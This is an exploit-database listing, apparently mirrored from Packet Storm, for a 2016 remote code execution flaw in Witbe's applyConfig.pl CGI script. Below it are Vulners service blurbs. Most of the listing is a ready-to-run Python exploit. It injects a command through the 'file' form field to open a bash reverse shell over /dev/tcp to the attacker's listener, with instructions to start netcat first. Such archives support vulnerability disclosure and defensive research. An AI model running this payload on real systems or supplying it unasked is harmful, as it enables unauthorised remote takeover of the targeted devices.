Lucene search
K

Witbe Remote Code Execution

🗓️ 06 Oct 2016 00:00:00Reported by BeLmarType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 23 Views

Witbe Remote Code Execution on Windows7/10 & BackBox, Vulnerability Through applyConfig.pl CG

Code
`#!/usr/bin/python  
# Exploit Title: Witbe RCE (Remote Code Execution)  
# Exploit Author: BeLmar  
# Date: 05/10/2016  
# DEMO : https://youtu.be/ooUFXfUfIs0  
# Contact : [email protected]  
# Vendor Homepage: http://www.witbe.net  
# Tested on: Windows7/10 & BackBox  
# Category: Remote Exploits  
  
import urllib  
import urllib2  
import os  
  
print " M MW M M XXMMrX, 2Mr72S MW7XS"   
print " MM MM M2 M SM MM MM M "   
print " M M ZM M M XM MMir0M MMrXS"   
print " MM M M M: M SM MM ZM M2 "   
print " MMa MMM M ZM MM XM M "   
print " XM M M iM 8MZ8W8 MM8BB"  
print " EXPLOIT BY BELMAR "  
print ""  
  
print "Run NetCat Listner" # First Run Netcat Listner   
  
rhost = raw_input('RHOST: ')  
lhost = raw_input('LHOST: ')  
lport = raw_input('LPORT: ')  
  
url = 'http://'+rhost+'/cgi-bin/applyConfig.pl'  
user_agent = 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36'  
values = {'auth_login': '', #Leave it as it is  
'auth_pwd': '', #Leave it as it is  
'file': 'set|bash -i >& /dev/tcp/'+lhost+'/'+lport+' 0>&1' }  
  
data = urllib.urlencode(values)  
req = urllib2.Request(url, data)  
response = urllib2.urlopen(req)  
the_page = response.read()  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation